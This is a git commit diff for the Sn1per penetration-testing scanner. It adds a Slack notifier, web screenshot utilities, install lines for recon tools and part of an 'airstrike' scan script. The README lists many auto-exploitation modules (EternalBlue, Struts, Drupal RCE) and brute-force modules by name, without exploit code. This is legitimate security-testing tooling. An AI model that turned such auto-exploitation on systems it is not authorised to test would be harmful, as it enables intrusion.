Sn1per Community Edition by @xer0dayz - https://xerosecurity.com

This commit is contained in:
WP Engine Marketing 2019-05-07 18:01:28 -07:00
parent 2703495428
commit 6fab10e142
33 changed files with 9496 additions and 2722 deletions

View File

@ -1,4 +1,17 @@
## CHANGELOG:
* v7.0 - Added "webscan" mode for automated Burpsuite 2.x and Arachni web application scans only
* v7.0 - Added Slack API notifications (Disabled by default..check ~/.sniper.conf)
* v7.0 - Added scheduled scan tasks command switch (Needs additional configuration to setup... check README)
* v7.0 - Added Axis2 authenticated deployer MSF exploit
* v7.0 - Added Axis2 login brute force module
* v7.0 - Added subjack tool to check for subdomain hijacking
* v7.0 - Added sorted IP lists under $LOOT_DIR/ips/ips-all-sorted.txt
* v7.0 - Added subnet retrieval for all 'recon' mode scans under $LOOT_DIR/nmap/subnets-$TARGET.txt
* v7.0 - Added Webscreenshot.py and disabled cutycapt from default config
* v7.0 - Added Gobuster (Disabled by default..check ~/.sniper.conf)
* v7.0 - Fixed issue with SubOver not working due to bad path
* v7.0 - Fixed issue with flyover mode running 2x
* v6.3 - Added Drupal RESET Unserialize RCE CVE-2019-6340
* v6.2 - Added Glassfish Admin traversal MSF exploit
* v6.2 - Added ElasticSearch Java Injection MSF RCE exploit
* v6.2 - Added WebTech web fingerprinting tool

View File

@ -1,2 +1,2 @@
## LICENSE:
Sn1per Community Edition is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz) and @XeroSecurity and is not for commercial use. For commercial and professional use, a Sn1per Professional license must be purchased at https://xerosecurity.com.
Sn1per Community Edition is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz) and @XeroSecurity and is not for commercial use. For professional use, a Sn1per Professional or Enterprise license must be purchased at https://xerosecurity.com.

116
README.md
View File

@ -4,8 +4,8 @@
[![GitHub issues](https://img.shields.io/github/issues/1N3/Sn1per.svg)](https://github.com/1N3/Sn1per/issues)
[![Github Stars](https://img.shields.io/github/stars/1N3/Sn1per.svg?style=social&label=Stars)](https://github.com/1N3/Sn1per/)
[![GitHub Followers](https://img.shields.io/github/followers/1N3.svg?style=social&label=Follow)](https://github.com/1N3/Sn1per/)
[![Tweet](https://img.shields.io/twitter/url/http/crowdshield.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=Sn1per%20-%20Automated%20Pentest%20Recon%20Scanner&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2F1N3%2FSn1per)
[![Follow on Twitter](https://img.shields.io/twitter/follow/crowdshield.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=crowdshield)
[![Tweet](https://img.shields.io/twitter/url/http/xer0dayz.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=Sn1per%20-%20Automated%20Pentest%20Recon%20Scanner&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2F1N3%2FSn1per)
[![Follow on Twitter](https://img.shields.io/twitter/follow/xer0dayz.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=xer0dayz)
## ABOUT:
Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to https://xerosecurity.com.
@ -59,25 +59,84 @@ To obtain a Sn1per Professional license, go to https://xerosecurity.com.
- [x] Automatically gathers screenshots of all web sites
- [x] Create individual workspaces to store all scan output
## AUTO-PWN:
- [x] Apache Struts CVE-2018-11776 RCE exploit
- [x] Android Insecure ADB RCE auto exploit
- [x] Apache Tomcat CVE-2017-12617 RCE exploit
- [x] Oracle WebLogic WLS-WSAT Component Deserialisation RCE CVE-2017-10271 exploit
- [x] Drupal Drupalgedon2 RCE CVE-2018-7600
- [x] GPON Router RCE CVE-2018-10561
- [x] Apache Struts 2 RCE CVE-2017-5638
- [x] Apache Struts 2 RCE CVE-2017-9805
- [x] Apache Jakarta RCE CVE-2017-5638
- [x] Shellshock GNU Bash RCE CVE-2014-6271
## EXPLOITS:
- [x] Drupal RESTful Web Services unserialize() SA-CORE-2019-003
- [x] Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts
- [x] Drupal: CVE-2018-7600: Remote Code Execution - SA-CORE-2018-002
- [x] GPON Routers - Authentication Bypass / Command Injection CVE-2018-10561
- [x] MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
- [x] Apache Tomcat: Remote Code Execution (CVE-2017-12617)
- [x] Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271
- [x] Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)
- [x] Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805)
- [x] Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)
- [x] Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269
- [x] ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249
- [x] Shellshock Bash Shell remote code execution CVE-2014-6271
- [x] HeartBleed OpenSSL Detection CVE-2014-0160
- [x] Default Apache Tomcat Creds CVE-2009-3843
- [x] MS Windows SMB RCE MS08-067
- [x] MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)
- [x] Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843
- [x] MS08-067 Microsoft Server Service Relative Path Stack Corruption
- [x] Webmin File Disclosure CVE-2006-3392
- [x] VsFTPd 2.3.4 Backdoor
- [x] ProFTPd 1.3.3C Backdoor
- [x] MS03-026 Microsoft RPC DCOM Interface Overflow
- [x] DistCC Daemon Command Execution
- [x] JBoss Java De-Serialization
- [x] HTTP Writable Path PUT/DELETE File Access
- [x] Apache Tomcat User Enumeration
- [x] Tomcat Application Manager Login Bruteforce
- [x] Jenkins-CI Enumeration
- [x] HTTP WebDAV Scanner
- [x] Android Insecure ADB
- [x] Anonymous FTP Access
- [x] PHPMyAdmin Backdoor RCE
- [x] PHPMyAdmin Backdoor
- [x] PHPMyAdmin Auth Bypass
- [x] JBoss Java De-Serialization RCE's
- [x] OpenSSH User Enumeration
- [x] LibSSH Auth Bypass
- [x] SMTP User Enumeration
- [x] Public NFS Mounts
## CORE INTEGRATIONS
- NMap
- Nikto
- Metasploit
- Arachni
- Burpsuite
- Slack API
- Censys API
## PLUGINS:
- BlackWidow
- GooHak
- BruteX
- CMSMap
- WPScan
- Shocker
- Slurp
- Spoofcheck
- SSH-Audit
- Sublist3r
- Wig
- Yasuo
- Inurlbr
- theHarvester
- Dirsearch
- Gobuster
- Clusterd
- Whatweb
- Jexboss
- Webtech
- Wafw00f
- Slurp
- Subjack
- crt.sh
- Subfinder
- Amass
- Dnscan
- Subover
- Project Sonar
- Subjack
## KALI LINUX INSTALL:
```
@ -130,6 +189,9 @@ sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>
[*] HTTPS WEB PORT HTTPS MODE
sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>
[*] WEBSCAN MODE
sniper -t|--target <TARGET> -m|--mode webscan
[*] ENABLE BRUTEFORCE
sniper -t|--target <TARGET> -b|--bruteforce
@ -139,6 +201,9 @@ sniper -t|--target <TARGET>
[*] LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimport
[*] LOOT REIMPORTALL FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimportall
[*] DELETE WORKSPACE
sniper -w <WORKSPACE_ALIAS> -d
@ -161,20 +226,19 @@ sniper -u|--update
* **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
* **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
* **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.
* **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
* **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
* **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.
* **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.
* **WEBSCAN:** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni.
## SAMPLE REPORT:
https://gist.github.com/1N3/8214ec2da2c91691bcbc
## LICENSE:
This software is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz @XeroSecurity) and is not for commercial use. Permission to distribute any part of the code for sale is strictly prohibited.
This software is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz @XeroSecurity) and is not for commercial use or resold and rebranded. Permission to distribute any part of the code for sale is strictly prohibited.
## DONATIONS:
Donations are welcome. This will help fascilitate improved features, frequent updates and better overall support for sniper.
- [x] BTC 1Fav36btfmdrYpCAR65XjKHhxuJJwFyKum
- [x] ETH 0x20bB09273702eaBDFbEE9809473Fd04b969a794d
- [x] LTC LQ6mPewec3xeLBYMdRP4yzeta6b9urqs2f
- [x] XMR 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbS3EN24xprAQ1Z5Sy5s
- [x] ZCASH t1fsizsk2cqqJAjRoUmXJSyoVa9utYucXt7
## LEGAL DISCLAIMER:
You may not rent or lease, distribute, modify, sell or transfer the software to a third party. Sn1per Community is free for distribution, and modification with the condition that credit is provided to the creator and not used for commercial use. You may not use software for illegal or nefarious purposes. No liability for consequential damages to the maximum extent permitted by all applicable laws. In no event shall XeroSecurity or any person be liable for any consequential, reliance, incidental, special, direct or indirect damages whatsoever (including without limitation, damages for loss of business profits, business interruption, loss of business information, personal injury, or any other loss) arising out of or in connection with the use or inability to use this product, even if XeroSecurity has been advised of the possibility of such damages.
## COPYRIGHT:
The software code and logos are owned by XeroSecurity and protected by United States copyright and/or patent laws of international treaty provisions. All rights reserved.

12
bin/slack.py Normal file
View File

@ -0,0 +1,12 @@
import os,sys
from slackclient import SlackClient
#slack_token = os.environ["SLACK_API_TOKEN"]
slack_token = ""
sc = SlackClient(slack_token)
sc.api_call(
"chat.postMessage",
channel="sn1per-professional",
text=str(sys.argv[1])
)

168
bin/webscreenshot.js Normal file
View File

@ -0,0 +1,168 @@
/***
# This file is part of webscreenshot.
#
# Copyright (C) 2014, Thomas Debize <tdebize at mail.com>
# All rights reserved.
#
# webscreenshot is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# webscreenshot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with webscreenshot. If not, see <http://www.gnu.org/licenses/>.
***/
var Page = (function(custom_headers, http_username, http_password) {
var opts = {
width: 1200,
height: 800,
ajaxTimeout: 400,
maxTimeout: 800,
httpAuthErrorCode: 2
};
var requestCount = 0;
var forceRenderTimeout;
var ajaxRenderTimeout;
var page = require('webpage').create();
page.viewportSize = {
width: opts.width,
height: opts.height
};
page.settings.userAgent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36';
page.settings.userName = http_username;
page.settings.password = http_password;
page.customHeaders = custom_headers;
page.onInitialized = function() {
page.customHeaders = {};
};
// Silence confirmation messages and errors
page.onConfirm = page.onPrompt = page.onError = noop;
page.onResourceRequested = function(request) {
requestCount += 1;
clearTimeout(ajaxRenderTimeout);
};
page.onResourceReceived = function(response) {
if (response.stage && response.stage == 'end' && response.status == '401') {
page.failReason = '401';
}
if (!response.stage || response.stage === 'end') {
requestCount -= 1;
if (requestCount === 0) {
ajaxRenderTimeout = setTimeout(renderAndExit, opts.ajaxTimeout);
}
}
};
var api = {};
api.render = function(url, file) {
opts.file = file;
page.open(url, function(status) {
if (status !== "success") {
if (page.failReason && page.failReason == '401') {
// Specific 401 HTTP code hint
phantom.exit(opts.httpAuthErrorCode);
} else {
// All other failures
phantom.exit(1);
}
} else {
forceRenderTimeout = setTimeout(renderAndExit, opts.maxTimeout);
}
});
};
function renderAndExit() {
// Trick to avoid transparent background
page.evaluate(function() {
document.body.bgColor = 'white';
});
page.render(opts.file);
phantom.exit(0);
}
function noop() {}
return api;
});
function main() {
var system = require('system');
var p_url = new RegExp('url_capture=(.*)');
var p_outfile = new RegExp('output_file=(.*)');
var p_header = new RegExp('header=(.*)');
var p_http_username = new RegExp('http_username=(.*)');
var http_username = '';
var p_http_password = new RegExp('http_password=(.*)');
var http_password = '';
var temp_custom_headers = {
// Nullify Accept-Encoding header to disable compression (https://github.com/ariya/phantomjs/issues/10930)
'Accept-Encoding': ' '
};
for(var i = 0; i < system.args.length; i++) {
if (p_url.test(system.args[i]) === true)
{
var URL = p_url.exec(system.args[i])[1];
}
if (p_outfile.test(system.args[i]) === true)
{
var output_file = p_outfile.exec(system.args[i])[1];
}
if (p_http_username.test(system.args[i]) === true)
{
http_username = p_http_username.exec(system.args[i])[1];
}
if (p_http_password.test(system.args[i]) === true)
{
http_password = p_http_password.exec(system.args[i])[1];
}
if (p_header.test(system.args[i]) === true)
{
var header = p_header.exec(system.args[i]);
var p_header_split = header[1].split(': ', 2);
var header_name = p_header_split[0];
var header_value = p_header_split[1];
temp_custom_headers[header_name] = header_value;
}
}
if (typeof(URL) === 'undefined' || URL.length == 0 || typeof(output_file) === 'undefined' || output_file.length == 0) {
console.log("Usage: phantomjs [options] webscreenshot.js url_capture=<URL> output_file=<output_file.png> [header=<custom header> http_username=<HTTP basic auth username> http_password=<HTTP basic auth password>]");
console.log('Please specify an URL to capture and an output png filename !');
phantom.exit(1);
}
else {
var page = Page(temp_custom_headers, http_username, http_password);
page.render(URL, output_file);
}
}
main();

432
bin/webscreenshot.py Normal file
View File

@ -0,0 +1,432 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of webscreenshot.
#
# Copyright (C) 2018, Thomas Debize <tdebize at mail.com>
# All rights reserved.
#
# webscreenshot is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# webscreenshot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with webscreenshot. If not, see <http://www.gnu.org/licenses/>.
import re
import os
import sys
import subprocess
import datetime
import time
import signal
import multiprocessing
import itertools
import shlex
import logging
import errno
# Script version
VERSION = '2.2.1'
# OptionParser imports
from optparse import OptionParser
from optparse import OptionGroup
# Options definition
parser = OptionParser(usage="usage: %prog [options] URL")
main_grp = OptionGroup(parser, 'Main parameters')
main_grp.add_option('-i', '--input-file', help = '<INPUT_FILE>: text file containing the target list. Ex: list.txt', nargs = 1)
main_grp.add_option('-o', '--output-directory', help = '<OUTPUT_DIRECTORY> (optional): screenshots output directory (default \'./screenshots/\')', nargs = 1)
main_grp.add_option('-r', '--renderer', help = '<RENDERER> (optional): renderer to use among \'phantomjs\' (legacy but best results), \'chrome\', \'chromium\' (version > 57) (default \'phantomjs\')', choices = ['phantomjs', 'chrome', 'chromium'], default = 'phantomjs', nargs = 1)
main_grp.add_option('-w', '--workers', help = '<WORKERS> (optional): number of parallel execution workers (default 2)', default = 2, nargs = 1)
main_grp.add_option('-v', '--verbosity', help = '<VERBOSITY> (optional): verbosity level, repeat it to increase the level { -v INFO, -vv DEBUG } (default verbosity ERROR)', action = 'count', default = 0)
proc_grp = OptionGroup(parser, 'Input processing parameters')
proc_grp.add_option('-p', '--port', help = '<PORT> (optional): use the specified port for each target in the input list. Ex: -p 80', nargs = 1)
proc_grp.add_option('-s', '--ssl', help = '<SSL> (optional): enforce ssl for every connection', action = 'store_true', default = False)
proc_grp.add_option('-m', '--multiprotocol', help = '<MULTIPROTOCOL> (optional): perform screenshots over HTTP and HTTPS for each target', action = 'store_true', default = False)
http_grp = OptionGroup(parser, 'HTTP parameters')
http_grp.add_option('-c', '--cookie', help = '<COOKIE_STRING> (optional): cookie string to add. Ex: -c "JSESSIONID=1234; YOLO=SWAG"', nargs = 1)
http_grp.add_option('-a', '--header', help = '<HEADER> (optional): custom or additional header. Repeat this option for every header. Ex: -a "Host: localhost" -a "Foo: bar"', action = 'append')
http_grp.add_option('-u', '--http-username', help = '<HTTP_USERNAME> (optional): specify a username for HTTP Basic Authentication.')
http_grp.add_option('-b', '--http-password', help = '<HTTP_PASSWORD> (optional): specify a password for HTTP Basic Authentication.')
conn_grp = OptionGroup(parser, 'Connection parameters')
conn_grp.add_option('-P', '--proxy', help = '<PROXY> (optional): specify a proxy. Ex: -P http://proxy.company.com:8080')
conn_grp.add_option('-A', '--proxy-auth', help = '<PROXY_AUTH> (optional): provides authentication information for the proxy. Ex: -A user:password')
conn_grp.add_option('-T', '--proxy-type', help = '<PROXY_TYPE> (optional): specifies the proxy type, "http" (default), "none" (disable completely), or "socks5". Ex: -T socks')
conn_grp.add_option('-t', '--timeout', help = '<TIMEOUT> (optional): renderer execution timeout in seconds (default 30 sec)', default = 30, nargs = 1)
parser.option_groups.extend([main_grp, proc_grp, http_grp, conn_grp])
# renderer binaries, hoping to find it in a $PATH directory
## Be free to change them to your own full-path location
PHANTOMJS_BIN = 'phantomjs'
CHROME_BIN = 'google-chrome'
CHROMIUM_BIN = 'chromium'
WEBSCREENSHOT_JS = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), './webscreenshot.js'))
SCREENSHOTS_DIRECTORY = os.path.abspath(os.path.join(os.getcwdu(), './screenshots/'))
# Logger definition
LOGLEVELS = {0 : 'ERROR', 1 : 'INFO', 2 : 'DEBUG'}
logger_output = logging.StreamHandler(sys.stdout)
logger_output.setFormatter(logging.Formatter('[%(levelname)s][%(name)s] %(message)s'))
logger_gen = logging.getLogger("General")
logger_gen.addHandler(logger_output)
# Macros
SHELL_EXECUTION_OK = 0
SHELL_EXECUTION_ERROR = -1
PHANTOMJS_HTTP_AUTH_ERROR_CODE = 2
# Handful patterns
p_ipv4_elementary = '(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})'
p_domain = '[a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,6}'
p_port = '\d{0,5}'
p_resource = '(?:/(?P<res>.*))?'
full_uri_domain = re.compile('^(?P<protocol>http(?:|s))://(?P<host>%s|%s)(?::(?P<port>%s))?%s$' % (p_domain, p_ipv4_elementary, p_port, p_resource))
fqdn_and_port = re.compile('^(?P<host>%s):(?P<port>%s)%s$' % (p_domain, p_port, p_resource))
fqdn_only = re.compile('^(?P<host>%s)%s$' % (p_domain, p_resource))
ipv4_and_port = re.compile('^(?P<host>%s):(?P<port>%s)%s' % (p_ipv4_elementary, p_port, p_resource))
ipv4_only = re.compile('^(?P<host>%s)%s$' % (p_ipv4_elementary, p_resource))
entry_from_csv = re.compile('^(?P<host>%s|%s)\s+(?P<port>\d+)$' % (p_domain, p_ipv4_elementary))
# Handful functions
def init_worker():
"""
Tell the workers to ignore a global SIGINT interruption
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
def kill_em_all(signal, frame):
"""
Terminate all processes while capturing a SIGINT from the user
"""
logger_gen.info('CTRL-C received, exiting')
sys.exit(0)
def shell_exec(url, command, options):
"""
Execute a shell command following a timeout
Taken from http://howto.pui.ch/post/37471155682/set-timeout-for-a-shell-command-in-python
"""
global SHELL_EXECUTION_OK, SHELL_EXECUTION_ERROR
logger_url = logging.getLogger("%s" % url)
logger_url.setLevel(options.log_level)
timeout = int(options.timeout)
start = datetime.datetime.now()
try :
p = subprocess.Popen(shlex.split(command), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# binaries timeout
while p.poll() is None:
time.sleep(0.1)
now = datetime.datetime.now()
if (now - start).seconds > timeout:
logger_url.debug("Shell command PID %s reached the timeout, killing it now" % p.pid)
logger_url.error("Screenshot somehow failed\n")
if sys.platform == 'win32':
p.send_signal(signal.SIGTERM)
else:
p.send_signal(signal.SIGKILL)
return SHELL_EXECUTION_ERROR
retval = p.poll()
if retval != SHELL_EXECUTION_OK:
if retval == PHANTOMJS_HTTP_AUTH_ERROR_CODE:
# HTTP Authentication request
logger_url.error("HTTP Authentication requested, try to pass credentials with -u and -b options")
else:
# Phantomjs general error
logger_url.error("Shell command PID %s returned an abnormal error code: '%s'" % (p.pid,retval))
logger_url.error("Screenshot somehow failed\n")
return SHELL_EXECUTION_ERROR
else:
# Phantomjs ok
logger_url.debug("Shell command PID %s ended normally" % p.pid)
logger_url.info("Screenshot OK\n")
return SHELL_EXECUTION_OK
except Exception as e:
if e.errno and e.errno == errno.ENOENT :
logger_url.error('renderer binary could not have been found in your current PATH environment variable, exiting')
else:
logger_gen.error('Unknown error: %s, exiting' % e )
return SHELL_EXECUTION_ERROR
def filter_bad_filename_chars(filename):
#print (filename)
"""
Filter bad chars for any filename
"""
# Before, just avoid triple underscore escape for the classic '://' pattern
filename = filename.replace('http://', '')
filename = filename.replace('https://', '')
#print (filename)
return re.sub('[^\w\-_\. ]', '-port', filename)
#print (filename)
def extract_all_matched_named_groups(regex, match):
"""
Return a set of all extractable matched parameters.
>>> full_uri_domain.groupindex
{'domain': 1, 'port': 3}
>>>full_uri_domain.match('http://8.8.8.8:80').group('domain')
'8.8.8.8'
>>>extract_all_matched_named_groups() => {'domain': '8.8.8.8', 'port': '80'}
"""
result = {}
for name, id in regex.groupindex.items():
matched_value = match.group(name)
if matched_value != None: result[name] = matched_value
return result
def entry_format_validator(line):
"""
Validate the current line against several regexes and return matched parameters (ip, domain, port etc.)
"""
tab = { 'full_uri_domain' : full_uri_domain,
'fqdn_only' : fqdn_only,
'fqdn_and_port' : fqdn_and_port,
'ipv4_and_port' : ipv4_and_port,
'ipv4_only' : ipv4_only,
'entry_from_csv' : entry_from_csv
}
for name, regex in tab.items():
validator = regex.match(line)
if validator:
return extract_all_matched_named_groups(regex, validator)
def parse_targets(options, arguments):
"""
Parse list and convert each target to valid URI with port(protocol://foobar:port)
"""
target_list = []
if options.input_file != None:
with open(options.input_file,'rb') as fd_input:
try:
lines = [l.decode('utf-8').lstrip().rstrip().strip() for l in fd_input.readlines()]
except UnicodeDecodeError as e:
logger_gen.error('Your input file is not UTF-8 encoded, please encode it before using this script')
sys.exit(0)
else:
lines = arguments
for index, line in enumerate(lines, start=1):
matches = entry_format_validator(line)
# pass if line can be recognized as a correct input, or if no 'host' group could be found with all the regexes
if matches == None or not('host' in matches.keys()):
logger_gen.warn("Line %s '%s' could not have been recognized as a correct input" % (index, line))
pass
else:
host = matches['host']
# Protocol is 'http' by default, unless ssl is forced
if options.ssl == True:
protocol = 'https'
elif 'protocol' in matches.keys():
protocol = str(matches['protocol'])
else:
protocol = 'http'
# Port is ('80' for http) or ('443' for https) by default, unless a specific port is supplied
if options.port != None:
port = options.port
elif 'port' in matches.keys():
port = int(matches['port'])
# if port is 443, assume protocol is https if is not specified
protocol = 'https' if port == 443 else protocol
else:
port = 443 if protocol == 'https' else 80
# No resource URI by default
if 'res' in matches.keys():
res = str(matches['res'])
else:
res = None
# perform screenshots over HTTP and HTTPS for each target
if options.multiprotocol:
final_uri_http_port = int(matches['port']) if 'port' in matches.keys() else 80
final_uri_http = '%s://%s:%s' % ('http', host, final_uri_http_port)
target_list.append(final_uri_http)
logger_gen.info("'%s' has been formatted as '%s' with supplied overriding options" % (line, final_uri_http))
final_uri_https_port = int(matches['port']) if 'port' in matches.keys() else 443
final_uri_https = '%s://%s:%s' % ('https', host, final_uri_https_port)
target_list.append(final_uri_https)
logger_gen.info("'%s' has been formatted as '%s' with supplied overriding options" % (line, final_uri_https))
else:
final_uri = '%s://%s:%s' % (protocol, host, port)
final_uri = final_uri + '/%s' % res if res != None else final_uri
target_list.append(final_uri)
logger_gen.info("'%s' has been formatted as '%s' with supplied overriding options" % (line, final_uri))
return target_list
def craft_cmd(url_and_options):
"""
Craft the correct command with url and options
"""
global logger_output, PHANTOMJS_BIN, WEBSCREENSHOT_JS, SCREENSHOTS_DIRECTORY, SHELL_EXECUTION_OK, SHELL_EXECUTION_ERROR
url, options = url_and_options
logger_url = logging.getLogger("%s" % url)
logger_url.addHandler(logger_output)
logger_url.setLevel(options.log_level)
#output_filename = os.path.join(SCREENSHOTS_DIRECTORY, ('%s.png' % filter_bad_filename_chars(url)))
output_filename = os.path.join(SCREENSHOTS_DIRECTORY, ('%s.jpg' % filter_bad_filename_chars(url)))
# PhantomJS renderer
if options.renderer == 'phantomjs':
# If you ever want to add some voodoo options to the phantomjs command to be executed, that's here right below
cmd_parameters = [ PHANTOMJS_BIN,
'--ignore-ssl-errors true',
'--ssl-protocol any',
'--ssl-ciphers ALL'
]
cmd_parameters.append("--proxy %s" % options.proxy) if options.proxy != None else None
cmd_parameters.append("--proxy-auth %s" % options.proxy_auth) if options.proxy_auth != None else None
cmd_parameters.append("--proxy-type %s" % options.proxy_type) if options.proxy_type != None else None
cmd_parameters.append('"%s" url_capture="%s" output_file="%s"' % (WEBSCREENSHOT_JS, url, output_filename))
cmd_parameters.append('header="Cookie: %s"' % options.cookie.rstrip(';')) if options.cookie != None else None
cmd_parameters.append('http_username="%s"' % options.http_username) if options.http_username != None else None
cmd_parameters.append('http_password="%s"' % options.http_password) if options.http_password != None else None
if options.header:
for header in options.header:
cmd_parameters.append('header="%s"' % header.rstrip(';'))
# Chrome and chromium renderers
else:
cmd_parameters = [ CHROME_BIN ] if options.renderer == 'chrome' else [ CHROMIUM_BIN ]
cmd_parameters += [ '--allow-running-insecure-content',
'--ignore-certificate-errors',
'--ignore-urlfetcher-cert-requests',
'--reduce-security-for-testing',
'--no-sandbox',
'--headless',
'--disable-gpu',
'--hide-scrollbars',
'--incognito',
'-screenshot="%s"' % output_filename,
'--window-size=1200,800',
'"%s"' % url
]
cmd_parameters.append('--proxy-server="%s"' % options.proxy) if options.proxy != None else None
cmd = " ".join(cmd_parameters)
logger_url.debug("Shell command to be executed\n'%s'\n" % cmd)
execution_retval = shell_exec(url, cmd, options)
return execution_retval, url
def take_screenshot(url_list, options):
"""
Launch the screenshot workers
Thanks http://noswap.com/blog/python-multiprocessing-keyboardinterrupt
"""
global SHELL_EXECUTION_OK, SHELL_EXECUTION_ERROR
screenshot_number = len(url_list)
print "[+] %s URLs to be screenshot" % screenshot_number
pool = multiprocessing.Pool(processes=int(options.workers), initializer=init_worker)
taken_screenshots = [r for r in pool.imap(func=craft_cmd, iterable=itertools.izip(url_list, itertools.repeat(options)))]
screenshots_error_url = [url for retval, url in taken_screenshots if retval == SHELL_EXECUTION_ERROR]
screenshots_error = sum(retval == SHELL_EXECUTION_ERROR for retval, url in taken_screenshots)
screenshots_ok = int(screenshot_number - screenshots_error)
print "[+] %s actual URLs screenshot" % screenshots_ok
print "[+] %s error(s)" % screenshots_error
if screenshots_error != 0:
for url in screenshots_error_url:
print " %s" % url
return None
def main():
"""
Dat main
"""
global VERSION, SCREENSHOTS_DIRECTORY, LOGLEVELS
signal.signal(signal.SIGINT, kill_em_all)
print 'webscreenshot.py version %s\n' % VERSION
options, arguments = parser.parse_args()
try :
options.log_level = LOGLEVELS[options.verbosity]
logger_gen.setLevel(options.log_level)
except :
parser.error("Please specify a valid log level")
if (options.input_file == None and (len(arguments) > 1 or len(arguments) == 0)):
parser.error('Please specify a valid input file or a valid URL')
if (options.input_file != None and len(arguments) == 1):
parser.error('Please specify either an input file or an URL')
if (options.output_directory != None):
SCREENSHOTS_DIRECTORY = os.path.abspath(os.path.join(os.getcwdu(), options.output_directory))
logger_gen.debug("Options: %s\n" % options)
if not os.path.exists(SCREENSHOTS_DIRECTORY):
logger_gen.info("'%s' does not exist, will then be created" % SCREENSHOTS_DIRECTORY)
os.makedirs(SCREENSHOTS_DIRECTORY)
url_list = parse_targets(options, arguments)
take_screenshot(url_list, options)
return None
if __name__ == "__main__" :
main()

View File

@ -86,6 +86,7 @@ pip install webtech
mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR
unzip slurp.zip
rm -f slurp.zip
cd ~/go/bin/;go get github.com/haccer/subjack
cd ~/go/bin/;go get -u github.com/Ice3man543/SubOver; mv SubOver /usr/local/bin/subover
cd ~/go/bin;go get -u github.com/OWASP/Amass/cmd/amass; mv amass /usr/local/bin/
cd ~/go/bin;go get -u github.com/subfinder/subfinder; mv subfinder /usr/local/bin/subfinder

View File

@ -59,11 +59,16 @@ if [ "$MODE" = "airstrike" ]; then
echo -e "$OKRED __________________________________________________________"
echo -e "$RESET"
if [ ! -z "$WORKSPACE_DIR" ]; then
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
